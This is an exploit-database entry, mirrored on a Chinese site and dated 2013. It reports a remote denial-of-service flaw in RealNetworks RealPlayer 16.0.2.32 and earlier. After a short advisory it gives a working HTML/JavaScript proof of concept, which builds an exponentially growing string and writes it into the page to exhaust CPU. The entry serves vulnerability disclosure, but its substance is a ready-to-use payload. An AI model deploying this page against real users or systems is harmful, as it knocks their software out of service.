RealNetworks RealPlayer – Denial of Service - 体验盒子

作者： Akshaysinh Vaghela

日期： 2013-07-02

类别：

dos

平台：

multiple

来源：https://www.exploit-db.com/exploits/38623/

1

2

3

4

5

6

7

8

9

10

source: https://www.securityfocus.com/bid/60903/info

RealNetworks RealPlayer is prone to a remote denial-of-service vulnerability.

Successful exploits will allow attackers to consume an excessive amount of CPU resources, denying service to legitimate users.

RealPlayer 16.0.2.32 and prior are vulnerable.

<html> <head> <script language="JavaScript"> { var buffer = '\x41' for(i=0; i <= 100 ; ++i) { buffer+=buffer+buffer document.write(buffer); } } </script> </head> </html>